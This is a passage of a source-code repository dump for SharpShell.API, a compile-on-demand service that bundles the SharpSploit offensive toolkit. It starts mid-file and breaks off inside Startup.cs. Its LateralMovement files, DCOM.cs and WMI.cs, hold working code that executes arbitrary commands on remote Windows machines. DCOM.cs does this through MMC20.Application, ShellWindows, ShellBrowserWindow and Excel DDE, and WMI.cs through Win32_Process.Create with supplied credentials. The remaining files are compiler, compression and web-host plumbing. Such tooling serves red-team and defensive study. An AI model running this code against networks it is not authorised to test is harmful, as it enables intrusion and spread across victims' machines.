builder1.Append(this.Results[0].ResultProperties[i].Name); 83 | builder2.Append(new String('-', this.Results[0].ResultProperties[i].Name.Length)); 84 | if (i != this.Results[0].ResultProperties.Count-1) 85 | { 86 | builder1.Append(new String(' ', PROPERTY_SPACE)); 87 | builder2.Append(new String(' ', PROPERTY_SPACE)); 88 | } 89 | } 90 | builder1.AppendLine(); 91 | builder1.AppendLine(builder2.ToString()); 92 | foreach (SharpSploitResult result in this.Results) 93 | { 94 | for (int i = 0; i < result.ResultProperties.Count; i++) 95 | { 96 | SharpSploitResultProperty property = result.ResultProperties[i]; 97 | string ValueString = property.Value.ToString(); 98 | builder1.Append(ValueString); 99 | if (i != result.ResultProperties.Count-1) 100 | { 101 | builder1.Append(new String(' ', Math.Max(1, property.Name.Length + PROPERTY_SPACE - ValueString.Length))); 102 | } 103 | } 104 | builder1.AppendLine(); 105 | } 106 | return builder1.ToString(); 107 | } 108 | return ""; 109 | } 110 | 111 | public T this[int index] { get => Results[index]; set => Results[index] = value; } 112 | 113 | public IEnumerator GetEnumerator() 114 | { 115 | return Results.Cast().GetEnumerator(); 116 | } 117 | 118 | IEnumerator IEnumerable.GetEnumerator() 119 | { 120 | return Results.Cast().GetEnumerator(); 121 | } 122 | 123 | public int IndexOf(T item) 124 | { 125 | return Results.IndexOf(item); 126 | } 127 | 128 | public void Add(T t) 129 | { 130 | Results.Add(t); 131 | } 132 | 133 | public void AddRange(IEnumerable range) 134 | { 135 | Results.AddRange(range); 136 | } 137 | 138 | public void Insert(int index, T item) 139 | { 140 | Results.Insert(index, item); 141 | } 142 | 143 | public void RemoveAt(int index) 144 | { 145 | Results.RemoveAt(index); 146 | } 147 | 148 | public void Clear() 149 | { 150 | Results.Clear(); 151 | } 152 | 153 | public bool Contains(T item) 154 | { 155 | return Results.Contains(item); 156 | } 157 | 158 | public void CopyTo(T[] array, int arrayIndex) 159 | { 160 | Results.CopyTo(array, arrayIndex); 161 | } 162 | 163 | public bool Remove(T item) 164 | { 165 | return Results.Remove(item); 166 | } 167 | } 168 | 169 | /// 170 | /// Abstract class that represents a result from a SharpSploit function. 171 | /// 172 | public abstract class SharpSploitResult 173 | { 174 | protected internal abstract IList ResultProperties { get; } 175 | } 176 | 177 | /// 178 | /// SharpSploitResultProperty represents a property that is a member of a SharpSploitResult's ResultProperties. 179 | /// 180 | public class SharpSploitResultProperty 181 | { 182 | public string Name { get; set; } 183 | public object Value { get; set; } 184 | } 185 | } 186 | -------------------------------------------------------------------------------- /SharpShell.API/Data/Source/SharpSploit/LateralMovement/DCOM.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpSploit (https://github.com/cobbr/SharpSploit) 3 | // License: BSD 3-Clause 4 | 5 | using System; 6 | using System.Linq; 7 | using System.Reflection; 8 | using System.Collections.Generic; 9 | 10 | namespace SharpSploit.LateralMovement 11 | { 12 | /// 13 | /// DCOM is a class for executing DCOM lateral movement techniques. 14 | /// 15 | public class DCOM 16 | { 17 | /// 18 | /// Execute a process on a remote system using various DCOM methods. 19 | /// 20 | /// ComputerName of remote system to execute process. 21 | /// Command to execute on remote system. 22 | /// 23 | /// 24 | /// DCOM execution method to use. Defaults to MMC20.Application. 25 | /// Bool. True if execution succeeds, false otherwise. 26 | /// 27 | /// Credit for the DCOM lateral movement techniques goes to Matt Nelson (@enigma0x3). This is 28 | /// a port of Steve Borosh (rvrshell)'s Invoke-DCOM implementation available 29 | /// here: https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/master/Invoke-DCOM.ps1 30 | /// 31 | public static bool DCOMExecute(string ComputerName, string Command, string Parameters = "", string Directory = "C:\\WINDOWS\\System32\\", DCOMMethod Method = DCOMMethod.MMC20_Application) 32 | { 33 | try 34 | { 35 | if (Method == DCOMMethod.MMC20_Application) 36 | { 37 | Type ComType = Type.GetTypeFromProgID("MMC20.Application", ComputerName); 38 | object RemoteComObject = Activator.CreateInstance(ComType); 39 | 40 | object Document = RemoteComObject.GetType().InvokeMember("Document", BindingFlags.GetProperty, null, RemoteComObject, null); 41 | object ActiveView = Document.GetType().InvokeMember("ActiveView", BindingFlags.GetProperty, null, Document, null); 42 | ActiveView.GetType().InvokeMember("ExecuteShellCommand", BindingFlags.InvokeMethod, null, ActiveView, new object[] { Command, Directory, Parameters, "7" }); 43 | } 44 | else if (Method == DCOMMethod.ShellWindows) 45 | { 46 | Type ComType = Type.GetTypeFromCLSID(CLSIDs[Method], ComputerName); 47 | object RemoteComObject = Activator.CreateInstance(ComType); 48 | 49 | object Item = RemoteComObject.GetType().InvokeMember("Item", BindingFlags.InvokeMethod, null, RemoteComObject, new object[] { }); 50 | object Document = Item.GetType().InvokeMember("Document", BindingFlags.GetProperty, null, Item, null); 51 | object Application = Document.GetType().InvokeMember("Application", BindingFlags.GetProperty, null, Document, null); 52 | Application.GetType().InvokeMember("ShellExecute", BindingFlags.InvokeMethod, null, Application, new object[] { Command, Parameters, Directory, null, 0 }); 53 | } 54 | else if (Method == DCOMMethod.ShellBrowserWindow) 55 | { 56 | Type ComType = Type.GetTypeFromCLSID(CLSIDs[Method], ComputerName); 57 | object RemoteComObject = Activator.CreateInstance(ComType); 58 | 59 | object Document = RemoteComObject.GetType().InvokeMember("Document", BindingFlags.GetProperty, null, RemoteComObject, null); 60 | object Application = Document.GetType().InvokeMember("Application", BindingFlags.GetProperty, null, Document, null); 61 | Application.GetType().InvokeMember("ShellExecute", BindingFlags.InvokeMethod, null, Application, new object[] { Command, Parameters, Directory, null, 0 }); 62 | } 63 | else if (Method == DCOMMethod.ExcelDDE) 64 | { 65 | Type ComType = Type.GetTypeFromProgID("Excel.Application", ComputerName); 66 | object RemoteComObject = Activator.CreateInstance(ComType); 67 | RemoteComObject.GetType().InvokeMember("DisplayAlerts", BindingFlags.SetProperty, null, RemoteComObject, new object[] { false }); 68 | RemoteComObject.GetType().InvokeMember("DDEInitiate", BindingFlags.InvokeMethod, null, RemoteComObject, new object[] { Command, Parameters }); 69 | } 70 | return true; 71 | } 72 | catch (Exception e) 73 | { 74 | Console.Error.WriteLine("DCOM Failed: " + e.Message); 75 | } 76 | return false; 77 | } 78 | 79 | /// 80 | /// Execute a process on a remote system using various DCOM methods. 81 | /// 82 | /// ComputerNames of remote systems to execute process. 83 | /// Command to execute on remote system. 84 | /// 85 | /// 86 | /// DCOM execution method to use. Defaults to MMC20.Application. 87 | /// Bool. True if execution succeeds, false otherwise. 88 | /// 89 | /// Credit for the DCOM lateral movement techniques goes to Matt Nelson (@enigma0x3). This is 90 | /// a port of Steve Borosh (rvrshell)'s Invoke-DCOM implementation available 91 | /// here: https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/master/Invoke-DCOM.ps1 92 | /// 93 | public static List DCOMExecute(List ComputerNames, string Command, string Parameters = "", string Directory = "C:\\WINDOWS\\System32\\", DCOMMethod Method = DCOMMethod.MMC20_Application) 94 | { 95 | return ComputerNames.Select(CN => DCOMExecute(CN, Command, Parameters, Directory, Method)).ToList(); 96 | } 97 | 98 | public enum DCOMMethod 99 | { 100 | MMC20_Application, 101 | ShellWindows, 102 | ShellBrowserWindow, 103 | ExcelDDE 104 | } 105 | 106 | private static readonly Dictionary CLSIDs = new Dictionary 107 | { 108 | { DCOMMethod.ShellWindows, new Guid("9BA05972-F6A8-11CF-A442-00A0C90A8F39") }, 109 | { DCOMMethod.ShellBrowserWindow, new Guid("C08AFD90-F2A1-11D1-8455-00A0C91F3880") } 110 | }; 111 | } 112 | } 113 | -------------------------------------------------------------------------------- /SharpShell.API/Data/Source/SharpSploit/LateralMovement/WMI.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpSploit (https://github.com/cobbr/SharpSploit) 3 | // License: BSD 3-Clause 4 | 5 | using System; 6 | using System.Linq; 7 | using System.Management; 8 | using System.Collections.Generic; 9 | 10 | namespace SharpSploit.LateralMovement 11 | { 12 | /// 13 | /// WMI is a class for executing WMI lateral movement techniques. 14 | /// 15 | public class WMI 16 | { 17 | /// 18 | /// Execute a process on a remote system using the WMI Win32_Process.Create method. 19 | /// 20 | /// ComputerName of remote system to execute process. 21 | /// Command to execute on remote system. 22 | /// Username to authenticate as to the remote system. 23 | /// Password to authenticate the user. 24 | /// Bool. True if execution succeeds, false otherwise. 25 | public static bool WMIExecute(string ComputerName, string Command, string Username, string Password) 26 | { 27 | ConnectionOptions options = new ConnectionOptions(); 28 | options.Username = Username; 29 | options.Password = Password; 30 | 31 | ManagementScope scope = new ManagementScope(String.Format("\\\\{0}\\root\\cimv2", ComputerName), options); 32 | 33 | try 34 | { 35 | scope.Connect(); 36 | var wmiProcess = new ManagementClass(scope, new ManagementPath("Win32_Process"), new ObjectGetOptions()); 37 | 38 | ManagementBaseObject inParams = wmiProcess.GetMethodParameters("Create"); 39 | PropertyDataCollection properties = inParams.Properties; 40 | inParams["CommandLine"] = Command; 41 | 42 | ManagementBaseObject outParams = wmiProcess.InvokeMethod("Create", inParams, null); 43 | 44 | Console.WriteLine("Win32_Process Create returned: " + outParams["returnValue"].ToString()); 45 | Console.WriteLine("ProcessID: " + outParams["processId"].ToString()); 46 | return true; 47 | } 48 | catch (Exception e) 49 | { 50 | Console.Error.WriteLine("WMI Exception:" + e.Message); 51 | } 52 | return false; 53 | } 54 | 55 | /// 56 | /// Execute a process on a remote system using the WMI Win32_Process.Create method. 57 | /// 58 | /// ComputerNames of remote systems to execute process. 59 | /// Command to execute on remote system. 60 | /// Username to authenticate as to the remote system. 61 | /// Password to authenticate the user. 62 | /// Bool. True if execution succeeds, false otherwise. 63 | public static List WMIExecute(List ComputerNames, string Command, string Username, string Password) 64 | { 65 | return ComputerNames.Select(CN => WMIExecute(CN, Command, Username, Password)).ToList(); 66 | } 67 | } 68 | } 69 | -------------------------------------------------------------------------------- /SharpShell.API/Data/Source/SharpSploit/Misc/CountdownEvent.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpSploit (https://github.com/cobbr/SharpSploit) 3 | // License: BSD 3-Clause 4 | 5 | using System; 6 | using System.Threading; 7 | 8 | namespace SharpSploit.Misc 9 | { 10 | /// 11 | /// CountdownEvent is used for counting Asynchronous operations 12 | /// 13 | /// 14 | /// Adapted from https://stackoverflow.com/questions/6790499 15 | /// 16 | public sealed class CountdownEvent : IDisposable 17 | { 18 | private readonly ManualResetEvent _countEvent = new ManualResetEvent(false); 19 | private readonly ManualResetEvent _reachedCountEvent = new ManualResetEvent(false); 20 | private volatile int _maxCount; 21 | private volatile int _currentCount = 0; 22 | private volatile bool _isDisposed = false; 23 | 24 | public CountdownEvent(int count) 25 | { 26 | this._maxCount = count; 27 | } 28 | 29 | public bool Signal() 30 | { 31 | if (this._isDisposed) 32 | { 33 | return false; 34 | } 35 | if (this._currentCount >= this._maxCount) 36 | { 37 | return true; 38 | } 39 | if (Interlocked.Increment(ref _currentCount) >= this._maxCount) 40 | { 41 | _reachedCountEvent.Set(); 42 | return true; 43 | } 44 | _countEvent.Set(); 45 | return false; 46 | } 47 | 48 | public bool Wait(int timeout = Timeout.Infinite) 49 | { 50 | if (this._isDisposed) 51 | { 52 | return false; 53 | } 54 | return _reachedCountEvent.WaitOne(timeout); 55 | } 56 | 57 | public bool WaitOne(int timeout = Timeout.Infinite) 58 | { 59 | if (this._isDisposed) 60 | { 61 | return false; 62 | } 63 | return _countEvent.WaitOne(timeout); 64 | } 65 | 66 | public void Dispose() 67 | { 68 | this.Dispose(true); 69 | GC.SuppressFinalize(this); 70 | } 71 | 72 | public void Dispose(bool disposing) 73 | { 74 | if (!this._isDisposed) 75 | { 76 | if (disposing) 77 | { 78 | ((IDisposable)_reachedCountEvent).Dispose(); 79 | ((IDisposable)_countEvent).Dispose(); 80 | } 81 | this._isDisposed = true; 82 | } 83 | } 84 | } 85 | } 86 | -------------------------------------------------------------------------------- /SharpShell.API/Data/Source/SharpSploit/Misc/Utilities.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpSploit (https://github.com/cobbr/SharpSploit) 3 | // License: BSD 3-Clause 4 | 5 | using System.IO; 6 | using System.IO.Compression; 7 | using System.Linq; 8 | using System.Reflection; 9 | 10 | namespace SharpSploit.Misc 11 | { 12 | public static class Utilities 13 | { 14 | private static string[] manifestResources = Assembly.GetExecutingAssembly().GetManifestResourceNames(); 15 | 16 | public static byte[] GetEmbeddedResourceBytes(string resourceName) 17 | { 18 | string resourceFullName = manifestResources.FirstOrDefault(N => N.Contains(resourceName + ".comp")); 19 | if (resourceFullName != null) 20 | { 21 | return Decompress(Assembly.GetExecutingAssembly().GetManifestResourceStream(resourceFullName).ReadFully()); 22 | } 23 | else if ((resourceFullName = manifestResources.FirstOrDefault(N => N.Contains(resourceName))) != null) 24 | { 25 | return Assembly.GetExecutingAssembly().GetManifestResourceStream(resourceFullName).ReadFully(); 26 | } 27 | return null; 28 | } 29 | 30 | public static byte[] ReadFully(this Stream input) 31 | { 32 | byte[] buffer = new byte[16 * 1024]; 33 | using (MemoryStream ms = new MemoryStream()) 34 | { 35 | int read; 36 | while((read = input.Read(buffer, 0, buffer.Length)) > 0) 37 | { 38 | ms.Write(buffer, 0, read); 39 | } 40 | return ms.ToArray(); 41 | } 42 | } 43 | 44 | public static byte[] Compress(byte[] Bytes) 45 | { 46 | byte[] compressedBytes; 47 | using (MemoryStream memoryStream = new MemoryStream()) 48 | { 49 | using (DeflateStream deflateStream = new DeflateStream(memoryStream, CompressionMode.Compress)) 50 | { 51 | deflateStream.Write(Bytes, 0, Bytes.Length); 52 | } 53 | compressedBytes = memoryStream.ToArray(); 54 | } 55 | return compressedBytes; 56 | } 57 | 58 | public static byte[] Decompress(byte[] compressed) 59 | { 60 | using (MemoryStream inputStream = new MemoryStream(compressed.Length)) 61 | { 62 | inputStream.Write(compressed, 0, compressed.Length); 63 | inputStream.Seek(0, SeekOrigin.Begin); 64 | using (MemoryStream outputStream = new MemoryStream()) 65 | { 66 | using (DeflateStream deflateStream = new DeflateStream(inputStream, CompressionMode.Decompress)) 67 | { 68 | byte[] buffer = new byte[4096]; 69 | int bytesRead; 70 | while ((bytesRead = deflateStream.Read(buffer, 0, buffer.Length)) != 0) 71 | { 72 | outputStream.Write(buffer, 0, bytesRead); 73 | } 74 | } 75 | return outputStream.ToArray(); 76 | } 77 | } 78 | } 79 | } 80 | } 81 | -------------------------------------------------------------------------------- /SharpShell.API/Models/Common.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpShell (https://github.com/cobbr/SharpShell) 3 | // License: BSD 3-Clause 4 | 5 | using System.IO; 6 | using System.Text; 7 | using System.Reflection; 8 | 9 | namespace SharpShell.API.Models 10 | { 11 | public static class Common 12 | { 13 | public static Encoding SharpShellEncoding = Encoding.UTF8; 14 | public static string SharpShellDirectory = Assembly.GetExecutingAssembly().Location.Split("bin")[0].Split("SharpShell.API.dll")[0]; 15 | public static string SharpShellDataDirectory = SharpShellDirectory + "Data" + Path.DirectorySeparatorChar; 16 | 17 | public static string SharpShellResourcesDirectory = SharpShellDataDirectory + "Resources" + Path.DirectorySeparatorChar; 18 | public static string SharpShellResourcesConfig = SharpShellResourcesDirectory + "resources.yml"; 19 | 20 | public static string SharpShellReferencesDirectory = SharpShellDataDirectory + "References" + Path.DirectorySeparatorChar; 21 | public static string SharpShellReferencesConfig = SharpShellReferencesDirectory + "references.yml"; 22 | 23 | public static string Net35Directory = SharpShellReferencesDirectory + "net35" + Path.DirectorySeparatorChar; 24 | public static string Net40Directory = SharpShellReferencesDirectory + "net40" + Path.DirectorySeparatorChar; 25 | 26 | public static string SharpShellSourceDirectory = SharpShellDataDirectory + "Source" + Path.DirectorySeparatorChar; 27 | } 28 | } -------------------------------------------------------------------------------- /SharpShell.API/Models/Compiler.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpShell (https://github.com/cobbr/SharpShell) 3 | // License: BSD 3-Clause 4 | 5 | using System; 6 | using System.IO; 7 | using System.Text; 8 | using System.Linq; 9 | using System.IO.Compression; 10 | using System.Collections.Generic; 11 | 12 | using Microsoft.CodeAnalysis; 13 | using Microsoft.CodeAnalysis.CSharp; 14 | using Microsoft.CodeAnalysis.CSharp.Syntax; 15 | using Microsoft.CodeAnalysis.Emit; 16 | 17 | namespace SharpShell.API.Models 18 | { 19 | public class Compiler 20 | { 21 | public class CompilationRequest 22 | { 23 | public string Source { get; set; } = null; 24 | public string SourceDirectory { get; set; } = null; 25 | public string ResourceDirectory { get; set; } = null; 26 | public string ReferenceDirectory { get; set; } = null; 27 | 28 | public DotNetVersion TargetDotNetVersion { get; set; } = DotNetVersion.Net35; 29 | public OutputKind OutputKind { get; set; } = OutputKind.DynamicallyLinkedLibrary; 30 | public Platform Platform { get; set; } = Platform.AnyCpu; 31 | public bool Optimize = true; 32 | 33 | public string AssemblyName { get; set; } = null; 34 | public List References { get; set; } = new List(); 35 | public List EmbeddedResources { get; set; } = new List(); 36 | } 37 | 38 | public enum DotNetVersion 39 | { 40 | Net35, 41 | Net40 42 | } 43 | 44 | public class EmbeddedResource 45 | { 46 | public string Name { get; set; } 47 | public string File { get; set; } 48 | public Platform Platform { get; set; } = Platform.AnyCpu; 49 | public bool Enabled { get; set; } = false; 50 | } 51 | 52 | public class Reference 53 | { 54 | public string File { get; set; } 55 | public DotNetVersion Framework { get; set; } = DotNetVersion.Net35; 56 | public bool Enabled { get; set; } = false; 57 | } 58 | 59 | private class SourceSyntaxTree 60 | { 61 | public string FileName { get; set; } = ""; 62 | public SyntaxTree SyntaxTree { get; set; } 63 | public List UsedTypes { get; set; } = new List(); 64 | } 65 | 66 | public static byte[] Compile(CompilationRequest request) 67 | { 68 | // Gather SyntaxTrees for compilation 69 | List sourceSyntaxTrees = Directory.GetFiles(request.SourceDirectory, "*.cs", SearchOption.AllDirectories) 70 | .Select(F => new SourceSyntaxTree { FileName = F, SyntaxTree = CSharpSyntaxTree.ParseText(File.ReadAllText(F), new CSharpParseOptions()) }) 71 | .ToList(); 72 | List compilationTrees = sourceSyntaxTrees.Select(S => S.SyntaxTree).ToList(); 73 | 74 | SyntaxTree sourceTree = CSharpSyntaxTree.ParseText(request.Source, new CSharpParseOptions()); 75 | compilationTrees.Add(sourceTree); 76 | 77 | // Use specified OutputKind and Platform 78 | CSharpCompilationOptions options = new CSharpCompilationOptions(outputKind: request.OutputKind, optimizationLevel: OptimizationLevel.Release, platform: request.Platform); 79 | // Compile to obtain SemanticModel 80 | CSharpCompilation compilation = CSharpCompilation.Create( 81 | request.AssemblyName == null ? Path.GetRandomFileName() : request.AssemblyName, 82 | compilationTrees, 83 | request.References.Where(R => R.Framework == request.TargetDotNetVersion).Where(R => R.Enabled).Select(R => 84 | { 85 | string folder = (request.TargetDotNetVersion == DotNetVersion.Net35 ? request.ReferenceDirectory + "net35" + Path.DirectorySeparatorChar : request.ReferenceDirectory + "net40" + Path.DirectorySeparatorChar); 86 | return MetadataReference.CreateFromFile(folder + R.File); 87 | }).ToList(), 88 | options 89 | ); 90 | 91 | // Perform source code optimization, removing unused types 92 | if (request.Optimize) 93 | { 94 | // Find all Types used by the generated compilation 95 | List usedTypes = new List(); 96 | GetUsedTypesRecursively(compilation, sourceTree, ref usedTypes, ref sourceSyntaxTrees); 97 | usedTypes = usedTypes.Distinct().ToList(); 98 | List usedTypeNames = usedTypes.Select(T => GetFullyQualifiedTypeName(T)).ToList(); 99 | // SharpGenConsole.PrintInfoLine("usedTypes: " + String.Join(",", usedTypeNames)); 100 | 101 | // Filter SyntaxTrees to trees that define a used Type, otherwise the tree is not needed in this compilation 102 | compilationTrees = sourceSyntaxTrees.Where(SST => SyntaxTreeDefinesUsedType(compilation, SST.SyntaxTree, usedTypeNames)) 103 | .Select(SST => SST.SyntaxTree) 104 | .ToList(); 105 | 106 | // Removed unused Using statements from the additional entrypoint source 107 | List usedNamespaceNames = GetUsedTypes(compilation, sourceTree) 108 | .Select(T => GetFullyQualifiedContainingNamespaceName(T)).Distinct().ToList(); 109 | // SharpGenConsole.PrintInfoLine("usedNamespaces: " + String.Join(",", usedNamespaceNames)); 110 | List unusedUsingDirectives = sourceTree.GetRoot().DescendantNodes().Where(N => 111 | { 112 | return N.Kind() == SyntaxKind.UsingDirective && !usedNamespaceNames.Contains(((UsingDirectiveSyntax)N).Name.ToFullString()); 113 | }).ToList(); 114 | sourceTree = sourceTree.GetRoot().RemoveNodes(unusedUsingDirectives, SyntaxRemoveOptions.KeepNoTrivia).SyntaxTree; 115 | 116 | // Compile again, with unused SyntaxTrees and unused using statements removed 117 | compilationTrees.Add(sourceTree); 118 | compilation = CSharpCompilation.Create( 119 | request.AssemblyName == null ? Path.GetRandomFileName() : request.AssemblyName, 120 | compilationTrees, 121 | request.References.Where(R => R.Framework == request.TargetDotNetVersion).Where(R => R.Enabled).Select(R => 122 | { 123 | string folder = (request.TargetDotNetVersion == DotNetVersion.Net35 ? request.ReferenceDirectory + "net35" + Path.DirectorySeparatorChar : request.ReferenceDirectory + "net40" + Path.DirectorySeparatorChar); 124 | return MetadataReference.CreateFromFile(folder + R.File); 125 | }).ToList(), 126 | options 127 | ); 128 | } 129 | 130 | // Emit compilation 131 | EmitResult emitResult; 132 | byte[] ILbytes = null; 133 | using (var ms = new MemoryStream()) 134 | { 135 | emitResult = compilation.Emit( 136 | ms, 137 | manifestResources: request.EmbeddedResources.Where(ER => 138 | { 139 | return request.Platform == Platform.AnyCpu || ER.Platform == Platform.AnyCpu || ER.Platform == request.Platform; 140 | }).Where(ER => ER.Enabled).Select(ER => 141 | { 142 | return new ResourceDescription(ER.Name, () => File.OpenRead(request.ResourceDirectory + ER.File), true); 143 | }).ToList() 144 | ); 145 | if (emitResult.Success) 146 | { 147 | ms.Flush(); 148 | ms.Seek(0, SeekOrigin.Begin); 149 | ILbytes = ms.ToArray(); 150 | } 151 | else 152 | { 153 | StringBuilder sb = new StringBuilder(); 154 | foreach (Diagnostic d in emitResult.Diagnostics) 155 | { 156 | sb.AppendLine(d.ToString()); 157 | } 158 | throw new CompilerException("CompilationErrors: " + Environment.NewLine + sb); 159 | } 160 | } 161 | return ILbytes; 162 | } 163 | 164 | private static string GetFullyQualifiedContainingNamespaceName(INamespaceSymbol namespaceSymbol) 165 | { 166 | string name = namespaceSymbol.Name; 167 | namespaceSymbol = namespaceSymbol.ContainingNamespace; 168 | while (namespaceSymbol != null) 169 | { 170 | name = namespaceSymbol.Name + "." + name; 171 | namespaceSymbol = namespaceSymbol.ContainingNamespace; 172 | } 173 | return name.Trim('.'); 174 | } 175 | 176 | private static string GetFullyQualifiedContainingNamespaceName(INamedTypeSymbol namedTypeSymbol) 177 | { 178 | return GetFullyQualifiedContainingNamespaceName(namedTypeSymbol.ContainingNamespace); 179 | } 180 | 181 | private static string GetFullyQualifiedTypeName(INamedTypeSymbol namedTypeSymbol) 182 | { 183 | return GetFullyQualifiedContainingNamespaceName(namedTypeSymbol) + "." + namedTypeSymbol.Name; 184 | } 185 | 186 | private static bool SyntaxTreeDefinesUsedType(CSharpCompilation compilation, SyntaxTree tree, List typeNames) 187 | { 188 | SemanticModel model = compilation.GetSemanticModel(tree); 189 | return null != tree.GetRoot().DescendantNodes().FirstOrDefault(SN => 190 | { 191 | if (SN.Kind() != SyntaxKind.ClassDeclaration) 192 | { 193 | return false; 194 | } 195 | INamedTypeSymbol symbol = model.GetDeclaredSymbol(((ClassDeclarationSyntax)SN)); 196 | if (symbol == null) 197 | { 198 | return false; 199 | } 200 | return typeNames.Contains( 201 | GetFullyQualifiedTypeName(symbol) 202 | ); 203 | }); 204 | } 205 | 206 | private static List GetUsedTypes(CSharpCompilation compilation, SyntaxTree sourceTree) 207 | { 208 | return sourceTree.GetRoot().DescendantNodes().Select(N => 209 | { 210 | ISymbol symbol = compilation.GetSemanticModel(sourceTree).GetSymbolInfo(N).Symbol; 211 | if (symbol != null && symbol.ContainingType != null) 212 | { 213 | return symbol.ContainingType; 214 | } 215 | return null; 216 | }).Distinct().Where(T => T != null).ToList(); 217 | } 218 | 219 | private static List GetUsedTypesRecursively(CSharpCompilation compilation, SyntaxTree sourceTree, ref List currentUsedTypes, ref List sourceSyntaxTrees) 220 | { 221 | List copyCurrentUsedTypes = currentUsedTypes.Select(CT => GetFullyQualifiedTypeName(CT)).ToList(); 222 | List usedTypes = GetUsedTypes(compilation, sourceTree) 223 | .Where(T => !copyCurrentUsedTypes.Contains(GetFullyQualifiedTypeName(T))) 224 | .ToList(); 225 | currentUsedTypes.AddRange(usedTypes); 226 | 227 | List searchTrees = new List(); 228 | foreach (INamedTypeSymbol symbol in usedTypes) 229 | { 230 | SyntaxReference sr = symbol.DeclaringSyntaxReferences.FirstOrDefault(); 231 | if (sr != null) 232 | { 233 | SourceSyntaxTree sst = sourceSyntaxTrees.FirstOrDefault(SST => SST.SyntaxTree == sr.SyntaxTree); 234 | if (sst != null) { sst.UsedTypes.Add(symbol); } 235 | string fullyQualifiedTypeName = GetFullyQualifiedTypeName(symbol); 236 | searchTrees.Add(sr.SyntaxTree); 237 | } 238 | } 239 | 240 | searchTrees = searchTrees.Distinct().ToList(); 241 | foreach (SyntaxTree tree in searchTrees) 242 | { 243 | List newTypes = GetUsedTypesRecursively(compilation, tree, ref currentUsedTypes, ref sourceSyntaxTrees); 244 | currentUsedTypes.AddRange(newTypes); 245 | } 246 | return currentUsedTypes; 247 | } 248 | 249 | public static byte[] Compress(byte[] bytes) 250 | { 251 | byte[] compressedILBytes; 252 | using (MemoryStream memoryStream = new MemoryStream()) 253 | { 254 | using (DeflateStream deflateStream = new DeflateStream(memoryStream, CompressionMode.Compress)) 255 | { 256 | deflateStream.Write(bytes, 0, bytes.Length); 257 | } 258 | compressedILBytes = memoryStream.ToArray(); 259 | } 260 | return compressedILBytes; 261 | } 262 | } 263 | 264 | public class CompilerException : Exception 265 | { 266 | public CompilerException() 267 | { 268 | 269 | } 270 | 271 | public CompilerException(string message) : base(message) 272 | { 273 | 274 | } 275 | 276 | public CompilerException(string message, Exception inner) : base(message, inner) 277 | { 278 | 279 | } 280 | } 281 | } -------------------------------------------------------------------------------- /SharpShell.API/Models/SharpShellContext.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpShell (https://github.com/cobbr/SharpShell) 3 | // License: BSD 3-Clause 4 | 5 | using Microsoft.EntityFrameworkCore; 6 | 7 | namespace SharpShell.API.Models 8 | { 9 | public class SharpShellContext : DbContext 10 | { 11 | public SharpShellContext(DbContextOptions options) : base(options) 12 | { 13 | 14 | } 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /SharpShell.API/Properties/launchSettings.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "http://json.schemastore.org/launchsettings.json", 3 | "iisSettings": { 4 | "windowsAuthentication": false, 5 | "anonymousAuthentication": true, 6 | "iisExpress": { 7 | "applicationUrl": "http://localhost:56312", 8 | "sslPort": 44352 9 | } 10 | }, 11 | "profiles": { 12 | "IIS Express": { 13 | "commandName": "IISExpress", 14 | "launchBrowser": true, 15 | "launchUrl": "api/values", 16 | "environmentVariables": { 17 | "ASPNETCORE_ENVIRONMENT": "Development" 18 | } 19 | }, 20 | "SharpSploit.API": { 21 | "commandName": "Project", 22 | "launchBrowser": true, 23 | "launchUrl": "api/values", 24 | "applicationUrl": "https://localhost:5001;http://localhost:5000", 25 | "environmentVariables": { 26 | "ASPNETCORE_ENVIRONMENT": "Development" 27 | } 28 | } 29 | } 30 | } -------------------------------------------------------------------------------- /SharpShell.API/SharpShell.API.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | netcoreapp2.1 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | -------------------------------------------------------------------------------- /SharpShell.API/SharpShellAPI.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpShell (https://github.com/cobbr/SharpShell) 3 | // License: BSD 3-Clause 4 | 5 | using Microsoft.AspNetCore; 6 | using Microsoft.AspNetCore.Hosting; 7 | using Microsoft.Extensions.Configuration; 8 | using Microsoft.Extensions.DependencyInjection; 9 | 10 | using SharpShell.API.Models; 11 | 12 | namespace SharpShell.API 13 | { 14 | public class SharpShellAPI 15 | { 16 | public static void Main(string[] args) 17 | { 18 | var host = CreateWebHostBuilder(args).Build(); 19 | using (var scope = host.Services.CreateScope()) 20 | { 21 | var services = scope.ServiceProvider; 22 | var context = services.GetRequiredService(); 23 | var configuration = services.GetRequiredService(); 24 | } 25 | host.Run(); 26 | } 27 | 28 | public static IWebHostBuilder CreateWebHostBuilder(string[] args) => 29 | new WebHostBuilder() 30 | .UseKestrel(options => 31 | { 32 | options.ListenAnyIP(5000); 33 | }) 34 | .UseStartup(); 35 | } 36 | } 37 | -------------------------------------------------------------------------------- /SharpShell.API/Startup.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpShell (https://github.com/cobbr/SharpShell) 3 | // License: BSD 3-Clause 4 | 5 | using Microsoft.AspNetCore.Mvc; 6 | using Microsoft.AspNetCore.Builder; 7 | using Microsoft.AspNetCore.Hosting; 8 | using Microsoft.EntityFrameworkCore; 9 | using Microsoft.Extensions.Configuration; 10 | using Microsoft.Extensions.DependencyInjection; 11 | using Swashbuckle.AspNetCore.Swagger; 12 | using SharpShell.API.Models; 13 | 14 | namespace SharpShell.API 15 | { 16 | public class 